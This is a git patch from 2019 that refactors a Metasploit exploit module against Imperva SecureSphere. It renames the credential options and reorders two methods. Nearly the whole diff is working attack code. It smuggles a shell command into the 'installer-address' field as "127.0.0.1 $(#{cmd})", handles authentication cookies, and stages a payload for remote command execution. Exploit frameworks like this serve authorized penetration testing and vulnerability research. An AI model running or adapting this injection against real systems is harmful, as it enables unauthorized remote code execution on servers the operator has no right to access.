From 4e76eeceb7627d4635772f100f62d44098ed394c Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 5 Mar 2019 21:37:55 -0600 Subject: [PATCH] Clean up module --- .../linux/http/imperva_securesphere_exec.rb | 110 +++++++++--------- 1 file changed, 56 insertions(+), 54 deletions(-) diff --git a/modules/exploits/linux/http/imperva_securesphere_exec.rb b/modules/exploits/linux/http/imperva_securesphere_exec.rb index b5aaca2afe..0a27d11d30 100644 --- a/modules/exploits/linux/http/imperva_securesphere_exec.rb +++ b/modules/exploits/linux/http/imperva_securesphere_exec.rb @@ -50,9 +50,9 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptPort.new('RPORT', [true, 'The target port', 443]), - OptString.new('USER', [false, 'Agent registration username', 'imperva']), - OptString.new('PASS', [false, 'Agent registration password', '']), + Opt::RPORT(443), + OptString.new('USERNAME', [true, 'Agent registration username', 'imperva']), + OptString.new('PASSWORD', [true, 'Agent registration password', '']), OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']), OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15]) ]) @@ -61,57 +61,6 @@ class MetasploitModule < Msf::Exploit::Remote ] end - def send_request(data) - req_params = { - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path), - 'data' => data.to_json - } - - unless datastore['USER'].to_s.empty? or datastore['PASS'].to_s.empty? - unless defined? @cookie - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri('/') - }) - unless res - fail_with(Failure::Unreachable, "#{peer} - Connection failed") - end - - @cookie = res.get_cookies - end - - req_params['cookie'] = @cookie - req_params['headers'] = { - 'Authorization' => basic_auth(datastore['USER'], datastore['PASS']) - } - end - - send_request_cgi(req_params, datastore['TIMEOUT']) - end - - def execute_command(cmd, opts = {}) - data = { - 'command' => 'impctl server status', - 'parameters' => { - 'broadcast' => true, - 'installer-address' => "127.0.0.1 $(#{cmd})" - } - } - - res = send_request data - if res - if res.code == 401 - fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required') - end - - unless res.code == 406 and res.body.include?("impctl") - fail_with(Failure::Unknown, 'Server did not respond in an expected way') - end - end - res - end - def check begin res = execute_command('id') @@ -138,4 +87,57 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending payload #{datastore['PAYLOAD']}") execute_cmdstager end + + def execute_command(cmd, opts = {}) + data = { + 'command' => 'impctl server status', + 'parameters' => { + 'broadcast' => true, + 'installer-address' => "127.0.0.1 $(#{cmd})" + } + } + + res = send_request data + + return unless res + + if res.code == 401 + fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required') + end + + unless res.code == 406 && res.body.include?("impctl") + fail_with(Failure::Unknown, 'Server did not respond in an expected way') + end + + res + end + + def send_request(data) + req_params = { + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'data' => data.to_json + } + + if datastore['USERNAME'] && datastore['PASSWORD'] + unless @cookie + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('/') + }) + unless res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + @cookie = res.get_cookies + end + + req_params['cookie'] = @cookie + req_params['headers'] = { + 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) + } + end + + send_request_cgi(req_params, datastore['TIMEOUT']) + end end